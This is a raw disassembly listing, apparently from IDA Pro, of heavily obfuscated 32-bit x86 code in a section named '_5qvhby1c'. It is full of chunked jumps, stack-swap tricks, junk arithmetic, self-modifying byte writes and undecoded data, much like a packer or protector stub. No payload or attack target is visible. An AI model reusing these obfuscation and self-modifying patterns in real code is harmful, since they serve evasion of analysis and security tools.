; FUNCTION CHUNK AT 0043CBEA SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043CFC8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D02A SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043D16C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043D290 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D87C SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043DDB3 SIZE 00000016 BYTES
xchg ecx, [esp+4+var_4]
pop ecx
pop eax
pop edx
jmp loc_43D290
sub_43B7F1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43B7FC proc near ; CODE XREF: sub_43B7F1-1933�j
; sub_43B7F1+197F�j
; FUNCTION CHUNK AT 0043A133 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043A814 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B6DD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CE79 SIZE 00000014 BYTES
push ebx
jmp loc_43A133
sub_43B7FC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dw 0C300h
dd 0F7810000h, 0E1D55235h, 68243C87h, 43DAEDh, 0FFFE8EE9h
dd 870000FFh, 8B5B241Ch, 1EE95610h, 0FFFFF9h
db 0
; ---------------------------------------------------------------------------
loc_43B829: ; CODE XREF: _5qvhby1c:loc_43C7FB�j
sub edx, 28F751BCh
test edx, 10000h
jmp loc_43B9C4
; ---------------------------------------------------------------------------
align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_221. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(0), 81h
dd 741B85E7h
db 6Ah
; =============== S U B R O U T I N E =======================================
sub_43B845 proc near ; CODE XREF: _5qvhby1c:0043A217�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0043A623 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043AF82 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C78F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043CDB2 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
popf
test [esp-4+arg_0], edi
jmp loc_43AF82
sub_43B845 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dw 5900h
; ---------------------------------------------------------------------------
push offset sub_43A9C4
jmp loc_43D240
; ---------------------------------------------------------------------------
align 10h
loc_43B860: ; CODE XREF: _5qvhby1c:loc_43A8AC�j
adc ebx, ecx
cmp ebp, eax
jmp loc_43B3C5
; ---------------------------------------------------------------------------
loc_43B869: ; DATA XREF: _5qvhby1c:loc_43A51B�o
xchg ebp, [esp]
push ebp
pop ecx
push 43A497h
jmp loc_43D411
; ---------------------------------------------------------------------------
dd 240C8700h, 3E4D6859h, 81582A42h, 3E44BAC0h, 0CB8B51B1h
dd 2501E9h
db 0
; ---------------------------------------------------------------------------
loc_43B891: ; CODE XREF: _5qvhby1c:00439DD3�j
sub eax, edi
; =============== S U B R O U T I N E =======================================
sub_43B893 proc near ; CODE XREF: _5qvhby1c:loc_43B6D6�p
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0043A269 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D288 SIZE 00000008 BYTES
xchg ecx, [esp+0]
xchg ebx, [esp+0]
mov ecx, ebx
pop ebx
mov byte ptr [ebx], 31h
pop ebx
jmp loc_43A269
sub_43B893 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 2
ja loc_43D2B8
jmp loc_43D0D6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C14F
loc_43B8B1: ; CODE XREF: sub_43C14F+F�j
or edx, edx
jz loc_43DE9B
push eax
push eax
mov eax, ebx
xchg eax, [esp+0]
mov ebx, offset loc_43A592
jmp loc_43C28B
; END OF FUNCTION CHUNK FOR sub_43C14F
; ---------------------------------------------------------------------------
pushf
mov ebp, ecx
jmp loc_43B3B6
; ---------------------------------------------------------------------------
db 0
; =============== S U B R O U T I N E =======================================
sub_43B8D3 proc near
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043A455 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0043AE88 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043C41A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043CE38 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D239 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DD62 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
push esi
push 0AACE5B7Fh
push ebx
mov ebx, offset loc_43AE88
jmp loc_43DD62
sub_43B8D3 endp
; ---------------------------------------------------------------------------
dd 22E9E800h, 0
; ---------------------------------------------------------------------------
loc_43B8F0: ; CODE XREF: _5qvhby1c:0043DB9C�j
jmp loc_43BCC7
; ---------------------------------------------------------------------------
db 2 dup(0), 87h
dd 995A2414h, 850FF9F7h, 0FFFFEDE3h, 0E9F98B57h, 1A52h
dd 0C300h, 0F5F4850Fh, 6852FFFFh, 0E430E5D2h, 13EA815Ah
dd 81D2C3E5h, 69DCB7F2h, 0EBFCE95Eh, 0C300FFFFh, 0B862C6F7h
dd 43E96F5Eh, 68000014h, 43DC2Fh, 0FFF66CE9h, 0C2D15AFFh
dd 4AA2F281h, 0C281505Fh, 976A79B5h, 0A423F281h, 0C2812C7Ch
dd 29AF864Bh, 19D6E9h, 87000000h, 240C87EEh, 243C8759h
dd 0FFF710E9h, 680000FFh, 43AFCBh, 11D5E9h, 240C8700h
dd 8159D18Bh, 847875CAh, 0C2F7D2h, 0E9000008h, 1188h, 87C88B00h
dd 685D240Ch, 43D14Bh, 0FFF8A8E9h, 68529CFFh, 0A2547210h
dd 8DF2815Ah, 81A6DA69h, 0BCAECBCAh, 0EBDAE835h, 0FFFFh
; ---------------------------------------------------------------------------
loc_43B9C4: ; CODE XREF: _5qvhby1c:0043B835�j
jnz loc_43C932
; START OF FUNCTION CHUNK FOR sub_43A948
loc_43B9CA: ; CODE XREF: sub_43A948+1C84�j
jmp loc_43D681
; END OF FUNCTION CHUNK FOR sub_43A948
; ---------------------------------------------------------------------------
align 10h
cmp ecx, 0E09D887Bh
jmp loc_43C91F
; ---------------------------------------------------------------------------
align 4
or edi, 39CBC7B7h
jmp loc_43BE97
; ---------------------------------------------------------------------------
align 4
dd 12C2C100h, 132EE281h, 0DEE88D37h, 14h, 87241487h, 0D58B242Ch
dd 57EC8B5Dh, 6AE95F51h, 6, 5F9C07C6h, 0BD30E881h, 0C0C124F6h
dd 0B9E95002h, 0FFFFEEh
db 0
; ---------------------------------------------------------------------------
loc_43BA21: ; CODE XREF: _5qvhby1c:0043B46A�j
xchg ebp, [esp]
mov ebx, offset loc_43B413
jmp loc_43B6A0
; ---------------------------------------------------------------------------
xchg ecx, [esp]
mov eax, ecx
pop ecx
xor eax, 930FC9A4h
or eax, 8ABBB237h
test eax, 4000h
jmp loc_43CA0F
; ---------------------------------------------------------------------------
align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_222. PRESS KEYPAD "+" TO EXPAND]
align 2
loc_43BA4E: ; CODE XREF: _5qvhby1c:0043C9B2�j
jmp loc_43D1F3
; ---------------------------------------------------------------------------
loc_43BA53: ; CODE XREF: _5qvhby1c:0043C4C2�j
jo loc_43BCDF
sbb esi, ecx
jmp loc_43CED5
; ---------------------------------------------------------------------------
loc_43BA60: ; CODE XREF: _5qvhby1c:loc_43C4E8�j
sub al, 99h
push 0A1B7731Fh
pop edx
rol edx, 5
add edx, 0E36BF2D6h
add edx, ebp
call sub_43B655
; ---------------------------------------------------------------------------
dd 12E90000h, 81FFFFE8h, 876651E0h, 0C0F709h, 0E9000200h
dd 0FFFFEAAEh, 0E8D58B00h, 0F06h, 8801C600h, 8B241487h
dd 0D0035ACAh, 0FFE37DE9h, 8807C6FFh, 24C1815Fh, 3ED20C2h
dd 1250E9D1h, 0C3000000h, 99E90000h, 0F000015h, 82880h
dd 0B9106800h, 3AE90043h, 0C3FFFFFEh, 0F6F3E900h, 0FEBBFFFFh
dd 0E90043AEh, 1CAAh, 81FD3300h, 2F33F2E9h, 1234E99Ch
dd 0
dd 0EE56DF68h, 240C87C3h, 8159F18Bh, 1B0BEEC6h, 7FEE81A5h
dd 0C1BA24ABh, 0E68102C6h, 0ADD313D5h, 0FFE6CDE9h, 870000FFh
dd 68582404h, 43C669h, 0FFFB85E9h
db 0FFh, 2 dup(0)
db 87h ; DATA XREF: sub_43CCA4�o
dd 95B241Ch, 0D7850FC0h, 0F000008h, 0FFE6BC84h, 0FA4CE9FFh
dd 880FFFFFh, 2086h, 0E781FD2Bh, 0D116B2BCh, 7D7CC781h
dd 0C703BEF9h, 0FFE75BE8h
db 0FFh, 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_43BB5F proc near ; CODE XREF: sub_43CEE8�j
; DATA XREF: _5qvhby1c:loc_43CEDE�o
; FUNCTION CHUNK AT 0043C290 SIZE 0000000D BYTES
mov byte ptr [edi], 8Bh
xchg eax, [esp+0]
mov edi, eax
pop eax
pop edi
jmp loc_43C290
sub_43BB5F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
retn
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h
dd 11E7h
dword_43BB78 dd 0D209108Bh, 0FC7A840Fh, 5251FFFFh, 1487D08Bh, 0FB23E924h
; DATA XREF: sub_43B7F1+25CE�o
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A948
loc_43BB8F: ; CODE XREF: sub_43A948+1705�j
jz loc_43A7D1
jmp loc_43C6B0
; END OF FUNCTION CHUNK FOR sub_43A948
; ---------------------------------------------------------------------------
locret_43BB9A: ; CODE XREF: _5qvhby1c:0043D0EB�j
retn
; ---------------------------------------------------------------------------
align 4
jmp nullsub_237
; ---------------------------------------------------------------------------
add eax, 991BDF02h
sub eax, 3632916Ah
push ebx
push 5B0589F9h
jmp loc_43DB07
; ---------------------------------------------------------------------------
dd 0C30000h, 241C8700h, 43DF9668h, 0E1F6E900h, 0FFFFh
dd 0D768C181h, 0E981B744h, 8C84A40Eh, 0FFF0E0E8h, 0FBE900FFh
dd 0FFFFFBh, 0CCA9EB68h, 0C2C15AE7h, 0BCCA8110h, 0C1520B8Fh
dd 0C28102C2h, 1093E05Ah, 2414879Dh, 0C51E9h
db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_231. PRESS KEYPAD "+" TO EXPAND]
align 4
loc_43BC08: ; CODE XREF: _5qvhby1c:0043DAB8�j
jmp loc_43CFCD
; ---------------------------------------------------------------------------
jmp loc_43D6A1
; ---------------------------------------------------------------------------
locret_43BC12: ; CODE XREF: _5qvhby1c:0043B60B�j
retn
; ---------------------------------------------------------------------------
align 4
dd 58240487h, 0F87D83h, 0E38E850Fh, 2EE9FFFFh, 0FFFFF5h
; ---------------------------------------------------------------------------
locret_43BC28: ; CODE XREF: _5qvhby1c:0043C998�j
retn
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43BC2B: ; CODE XREF: _5qvhby1c:loc_43DAC3�j
jmp locret_43D4C4
; ---------------------------------------------------------------------------
dword_43BC30 dd 0E55F0B68h, 0E7815F52h, 27536708h, 0F03C7C1h, 0FFEDF583h
; DATA XREF: _5qvhby1c:0043C993�o
dd 92E900FFh, 3BFFFFF5h, 0EDE0E9CEh, 0C3FFFFh, 24048700h
dd 1DD7E9h, 0D680000h, 0E90043DBh, 1E98h, 9D00C600h, 0D0C98158h
dd 81D7EED2h, 44D566C1h, 0F909E908h, 0FFFFh, 0F0BC2C1h
dd 0BA183h, 2B000000h, 92C2F7F3h, 0E9A9D723h, 0E33h
db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_224. PRESS KEYPAD "+" TO EXPAND]
db 0
; ---------------------------------------------------------------------------
loc_43BC9B: ; CODE XREF: _5qvhby1c:0043B2D2�j
jmp loc_43BD0E
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_43BCA1: ; CODE XREF: _5qvhby1c:loc_43B20B�j
jmp loc_43D633
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_43AE40
loc_43BCA8: ; CODE XREF: sub_43AE40+11�j
jmp loc_43ACA9
; END OF FUNCTION CHUNK FOR sub_43AE40
; ---------------------------------------------------------------------------
db 2 dup(0), 0BDh
dd 9AE15AF0h, 0E3E9CA8Bh, 0Ch
db 0
; ---------------------------------------------------------------------------
locret_43BCBD: ; CODE XREF: _5qvhby1c:0043CFD2�j
retn
; ---------------------------------------------------------------------------
align 10h
jmp loc_43D194
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43BCC7: ; CODE XREF: _5qvhby1c:loc_43B8F0�j
jz loc_43D3B3
; ---------------------------------------------------------------------------
db 2 dup(0), 81h
; ---------------------------------------------------------------------------
sal byte ptr [edi+3BF74C9Fh], cl
cmc
jmp loc_43CE4D
; ---------------------------------------------------------------------------
loc_43BCDC: ; CODE XREF: sub_43B7F1:loc_43CBF5�p
xchg eax, [esp]
loc_43BCDF: ; CODE XREF: _5qvhby1c:loc_43BA53�j
pop eax
push ebx
mov ebx, edx
call sub_43A382
add cl, ch ; CODE XREF: _5qvhby1c:0043DF21�j
sub al, 0F6h
; ---------------------------------------------------------------------------
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
loc_43BCEF: ; CODE XREF: _5qvhby1c:0043B06B�j
jz near ptr dword_43A834+64h
loc_43BCF5: ; CODE XREF: _5qvhby1c:0043D6AB�j
jmp near ptr dword_43AE90+3Ch
; ---------------------------------------------------------------------------
dw 0F00h
dd 4A48Bh, 0FE34BE00h, 0C687EB08h, 0FFF3ABE9h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
loc_43BD0E: ; CODE XREF: _5qvhby1c:loc_43BC9B�j
add ecx, ebp
add ecx, 1ADD3021h
mov ecx, [ecx]
xchg ecx, [esp]
loc_43BD1B: ; DATA XREF: sub_43B2E6+9�o
pop ebp
adc eax, offset dword_4300C0
push dword ptr [ebp-4]
jmp near ptr dword_43AB38+22h
; ---------------------------------------------------------------------------
align 2
retn
; ---------------------------------------------------------------------------
align 4
loc_43BD2C: ; CODE XREF: _5qvhby1c:0043D8EA�j
jmp near ptr dword_43A6A8+51h
; ---------------------------------------------------------------------------
db 0
db 0
db 9Ch ;
db 68h ; h
db 73h ; s
db 0A3h ;
db 1Dh
db 85h ;
db 5Ah ; Z
db 0E9h ;
db 59h ; Y
db 6
db 0
db 0
db 68h ; h
db 0B3h ;
db 0Ah
db 0B2h ;
db 0C2h ;
db 0E8h ;
db 6Bh ; k
db 15h
db 0
db 0
db 0
db 0E9h ;
db 0B1h ;
db 0F4h ;
db 0FFh
db 0FFh
db 0
db 0
byte_43BD51 db 9Dh, 87h, 4 ; DATA XREF: sub_43D51D-540�o
dd 0ED6BE924h, 0FFFFh, 8DE16856h, 0A1E930B8h, 68FFFFF3h
dd 43B66Bh, 0FFEF79E9h, 810000FFh, 0EB8CE9h, 97F981EAh
dd 0E93A8DD5h, 0FFFFF673h, 8B0000C3h, 0E77AE812h
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
locret_43BD8E: ; CODE XREF: _5qvhby1c:loc_43D411�j
retn
; ---------------------------------------------------------------------------
jmp loc_43A69C
; ---------------------------------------------------------------------------
dd 0FFFB96E9h, 64E900FFh, 0C1FFFFE2h, 6CE905E0h
db 13h, 2 dup(0)
; ---------------------------------------------------------------------------
locret_43BDA7: ; CODE XREF: _5qvhby1c:loc_43CD50�j
retn
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BEF5
loc_43BDAA: ; CODE XREF: sub_43BEF5+55E�j
jmp nullsub_239
; END OF FUNCTION CHUNK FOR sub_43BEF5
; ---------------------------------------------------------------------------
align 10h
db 0
; ---------------------------------------------------------------------------
loc_43BDB1: ; CODE XREF: _5qvhby1c:loc_43C6CB�j
call sub_43BFFD
loc_43BDB6: ; CODE XREF: _5qvhby1c:0043D69B�j
jmp loc_43D57A
; ---------------------------------------------------------------------------
push 43B611h
jmp loc_43C484
; ---------------------------------------------------------------------------
db 2 dup(0)
byte_43BDC7 db 0Fh ; DATA XREF: _5qvhby1c:loc_43A278�o
; _5qvhby1c:0043D92C�w
dword_43BDC8 dd 0EC781h, 74E85000h, 0FFFFF4h, 0D5AE9h, 0EF130000h, 0A2CE9h
dd 50000000h, 87C78B50h, 0F4682404h, 5F97A3D0h, 0E91FC7C1h
dd 0FFFFF2DAh, 94C08100h, 0E8191459h, 1769h, 0E8575E00h
dd 51Eh, 0C30000h, 0FB2FE900h, 0FFFFh, 5B8703C6h, 85C3815Bh
dd 81D9E6B5h, 0D8413BEBh, 0E2E5E925h, 2368FFFFh, 0E90043B4h
dd 0FFFFF816h, 45C3F700h, 0E9B1A3E4h, 0FFFFEFF6h, 56FC458Bh
dd 80D7D968h, 0CE815E00h, 0F252BB0Ch, 0E338880Fh, 0E999FFFFh
dd 168Ch, 0D5BA6800h, 4DE90043h, 17h, 6B840F00h, 0E9FFFFDFh
dd 0FFFFFC07h, 0D7030000h, 0FFDF57E9h
db 0FFh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_240. PRESS KEYPAD "+" TO EXPAND]
align 4
; START OF FUNCTION CHUNK FOR sub_43DF7B
loc_43BE84: ; CODE XREF: sub_43DF7B-3F3A�j
jmp nullsub_236
; END OF FUNCTION CHUNK FOR sub_43DF7B
; ---------------------------------------------------------------------------
db 2 dup(0), 81h
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
stosd
movsd
inc ebx
lodsb
jmp loc_43D728
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_43BE97: ; CODE XREF: _5qvhby1c:0043B9E2�j
rol ebx, 11h
xchg ebx, [esp]
pop ebx
push esi
mov esi, 43A537h
jmp near ptr dword_43A0DC+51h
; ---------------------------------------------------------------------------
align 2
word_43BEAA dw 0D568h ; DATA XREF: _5qvhby1c:0043D0E6�o
dd 0E900439Fh, 0FFFFF6CDh, 6C60000h, 68525E8Bh, 8438CCAAh
dd 72F2815Ah, 0E98B48B9h, 2009h, 6EC46851h, 0D159F832h
dd 1FF181C1h, 815E73BCh, 9A4E01E9h, 0DC1C116h, 0FFF094E9h
db 0FFh
; ---------------------------------------------------------------------------
loc_43BEE9: ; CODE XREF: _5qvhby1c:loc_43D232�j
add eax, edi
pop edi
mov eax, [eax]
mov al, [eax]
jmp loc_43C4E8
; =============== S U B R O U T I N E =======================================
sub_43BEF5 proc near ; CODE XREF: _5qvhby1c:0043A7CC�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043B066 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BDAA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BF9A SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043C434 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0043D07E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DD08 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043DE72 SIZE 0000000F BYTES
xchg ebx, [esp+0]
xchg edx, [esp+0]
mov ebx, edx
pop edx
push ebx
push esi
mov esi, offset byte_43CD91
jmp loc_43BF9A
sub_43BEF5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dw 0C700h
dd 63658B45h, 45C76574h, 5B20648Fh, 0F58B5600h, 0E9243487h
dd 0FFFFEA02h
db 0, 0C3h, 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_223. PRESS KEYPAD "+" TO EXPAND]
db 0
; ---------------------------------------------------------------------------
loc_43BF29: ; CODE XREF: _5qvhby1c:00439DEF�j
jmp locret_43D0F0
; ---------------------------------------------------------------------------
db 0
; =============== S U B R O U T I N E =======================================
sub_43BF2F proc near ; CODE XREF: _5qvhby1c:loc_43C13F�p
; _5qvhby1c:0043C14A�j
xchg ecx, [esp+0]
xchg ebp, [esp+0]
mov ecx, ebp
pop ebp
mov byte ptr [ecx], 87h
pop ecx
jmp near ptr dword_43A528+1Ch
sub_43BF2F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 2 dup(0), 8Bh
dd 1972E9CDh, 0C3000000h, 0FFF308E9h, 0E90000FFh, 154Dh
dd 40E90000h, 0E9FFFFEDh, 1397h, 2B7BFD81h, 20E977D6h
dd 5, 0EF33E9C3h
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
loc_43BF77: ; CODE XREF: _5qvhby1c:0043ADA3�j
jmp loc_43DB9B
; ---------------------------------------------------------------------------
dd 7C60000h, 87685F3Ch, 0E90043BDh, 0FFFFF090h
db 0
; ---------------------------------------------------------------------------
loc_43BF8D: ; CODE XREF: _5qvhby1c:0043D739�j
call sub_43D51D
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C14F
loc_43BF93: ; CODE XREF: sub_43C14F-20DF�j
jmp loc_43A574
; END OF FUNCTION CHUNK FOR sub_43C14F
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BEF5
loc_43BF9A: ; CODE XREF: sub_43BEF5+10�j
mov byte ptr [esi], 0FFh
pop esi
push ebp
or ebp, 0A236DAC5h
jmp loc_43DE72
; END OF FUNCTION CHUNK FOR sub_43BEF5
; ---------------------------------------------------------------------------
dw 0C600h
dd 4878B07h, 58F88B24h, 0A5DE9h, 840F0000h, 0FFFFECAFh
dd 3B570000h, 0F0F9E9F7h, 0FFFFh
dword_43BFCC dd 59C601C6h, 9DB4058Dh db 43h, 0
word_43BFD6 dw 0C6h ; DATA XREF: _5qvhby1c:00439DB5�o
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 68h, 77h, 0C8h
dd 23E90043h, 9CFFFFF1h, 0FFF048E9h
db 0FFh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_239. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jmp loc_43D80E
; ---------------------------------------------------------------------------
byte_43BFEF db 8Bh ; DATA XREF: sub_43BEF5+559�o
dd 0EBAFE8ECh
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B655
loc_43BFF6: ; CODE XREF: sub_43B655+11�j
jmp loc_439E94
; END OF FUNCTION CHUNK FOR sub_43B655
; ---------------------------------------------------------------------------
adc esi, ebp
; =============== S U B R O U T I N E =======================================
sub_43BFFD proc near ; CODE XREF: _5qvhby1c:loc_43BDB1�p
; FUNCTION CHUNK AT 0043CA5A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043DAE8 SIZE 00000005 BYTES
xchg edi, [esp+0]
xchg edx, [esp+0]
mov edi, edx
pop edx
jmp loc_43DAE8
sub_43BFFD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dd 52EC8B00h, 1487D18Bh, 0B1856824h, 0A1E90043h, 81000013h
dd 17358AFBh, 0E0C3E940h
db 2 dup(0FFh)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_232. PRESS KEYPAD "+" TO EXPAND]
align 4
locret_43C02C: ; CODE XREF: _5qvhby1c:loc_43D905�j
retn
; ---------------------------------------------------------------------------
jmp loc_43CD72
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_43A948
loc_43C034: ; CODE XREF: sub_43A948:loc_43D9A3�j
mov edi, eax
pop eax
or eax, 267C2A3Eh
add eax, 99C5555Eh
mov eax, [eax]
or eax, eax
jnz loc_43C6BC
jmp loc_43BB8F
; END OF FUNCTION CHUNK FOR sub_43A948
; ---------------------------------------------------------------------------
dw 8100h
dd 910C48C6h, 8ECE8C0h, 0E9000000h, 0BD5h ; CODE XREF: _5qvhby1c:0043DD4B�j
; ---------------------------------------------------------------------------
loc_43C064: ; CODE XREF: _5qvhby1c:0043D7F1�j
jmp locret_43B241
; ---------------------------------------------------------------------------
db 53h, 68h, 0DAh
dd 0E90043BAh, 0FFFFFA5Fh, 243C8700h, 0A66E058Dh, 68510043h
dd 8A0B53FDh, 1311E9h, 9C000000h, 5F226853h, 0C15B7C53h
dd 46E91CC3h
db 0Bh, 2 dup(0)
byte_43C09B db 0FFh ; DATA XREF: _5qvhby1c:0043B49A�o
dd 4300C015h
db 0, 6Ah, 0FFh
byte_43C0A3 db 0E6h ; DATA XREF: _5qvhby1c:0043B451�o
; ---------------------------------------------------------------------------
adc eax, offset dword_4300C0
push 43ADE7h
jmp loc_43C4FC
; ---------------------------------------------------------------------------
align 4
dd 7AE56851h, 8159EC38h, 0A6C21BE1h, 0F1C981D1h, 0E8A5E907h
dd 0FFFFEDADh, 0C870000h, 8A685924h, 0E90043AAh, 0FFFFE9A0h
; ---------------------------------------------------------------------------
loc_43C0DC: ; CODE XREF: _5qvhby1c:0043C352�j
popf
push edi
pop ebp
loc_43C0DF: ; CODE XREF: _5qvhby1c:loc_43C343�j
or esi, 70BAF330h
jmp near ptr word_439DC6+1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DC52
loc_43C0EA: ; CODE XREF: sub_43DC52+C�j
pop edx
and edx, 6B7B237h
test edx, 8
jmp near ptr dword_439DF4+65h
; END OF FUNCTION CHUNK FOR sub_43DC52
; ---------------------------------------------------------------------------
db 0
db 0
db 0C3h ;
db 0
db 0E9h ;
db 0BDh ;
db 6
db 0
db 0
db 0
db 68h ; h
db 6Ah ; j
db 11h
db 22h ; "
db 0C3h ;
db 87h ;
db 34h ; 4
db 24h ; $
db 8Bh ;
db 0CEh ;
db 5Eh ; ^
db 0C1h ;
db 0C1h ;
db 13h
db 81h ;
db 0F1h ;
db 39h ; 9
db 0F0h ;
db 76h ; v
db 46h ; F
db 81h ;
db 0C1h ;
db 0A1h ;
db 70h ; p
db 71h ; q
db 0E5h ;
db 0E9h ;
db 65h ; e
db 1Eh
db 0
db 3 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B265
loc_43C127: ; CODE XREF: sub_43B265:loc_43CC19�j
push offset byte_43D3CD
jmp nullsub_222
; END OF FUNCTION CHUNK FOR sub_43B265
; ---------------------------------------------------------------------------
align 2
sub edi, 595D5BDFh
jmp loc_43D68C
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43C13F: ; CODE XREF: _5qvhby1c:0043DA91�j
call sub_43BF2F
add cl, al
retf
; ---------------------------------------------------------------------------
db 0Fh
; ---------------------------------------------------------------------------
add ebp, ebx
jmp sub_43BF2F
; =============== S U B R O U T I N E =======================================
sub_43C14F proc far ; CODE XREF: _5qvhby1c:0043D3B9�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00439F05 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043A066 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043A253 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0043A574 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 0043B8B1 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043BF93 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C28B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D7C4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DE9B SIZE 00000008 BYTES
xchg eax, [esp+0]
pop eax
add eax, ecx
xchg esi, [esp-4+arg_0]
mov ecx, esi
pop esi
loc_43C15B: ; DATA XREF: sub_43A7DE-7E6�o
xchg eax, [esp-8+arg_4]
jmp loc_43B8B1
sub_43C14F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A156
loc_43C163: ; CODE XREF: sub_43A156+15�j
xchg ebx, [esp-4+arg_0]
pop ebx
add edx, 8874782h
xchg edx, [esp-8+arg_4]
jmp nullsub_237
; END OF FUNCTION CHUNK FOR sub_43A156
; ---------------------------------------------------------------------------
db 2 dup(0), 8Dh
dd 43A27805h, 12800F00h, 0E8FFFFE6h, 0FFFFF74Bh, 5A241487h
dd 0B593C681h, 34878547h, 0E8CBE924h, 0FFFFh, 2916E181h
dd 0C1C1475Ch, 0CC18104h, 87BB400Fh, 4C68240Ch, 0E90043A8h
dd 0FFFFEFBFh, 68AE5800h, 260FE9B1h, 8B241487h, 0E0815AC2h
dd 0B8240402h, 5BE9h, 988F0F00h, 87000018h, 0C65A2414h
dd 7E89C01h, 0E9FFFFF3h, 9B7h, 0F3F5E9C3h, 0E900FFFFh
dd 0FFFFF1E2h, 18C8C100h, 0E20BE99Ch, 8700FFFFh, 7468242Ch
dd 596EC5D9h, 0E918C1C1h, 0FFFFFF8Ch, 0CB810000h, 0CC35CA4h
dd 0FFFDDEE9h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
; START OF FUNCTION CHUNK FOR sub_43A382
loc_43C21E: ; CODE XREF: sub_43A382+2485�j
jge loc_43DC80
; END OF FUNCTION CHUNK FOR sub_43A382
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43C226: ; CODE XREF: _5qvhby1c:0043D20F�j
jmp loc_43D9DC
; ---------------------------------------------------------------------------
align 4
jmp loc_43C273
; ---------------------------------------------------------------------------
align 2
dw 0C0F7h
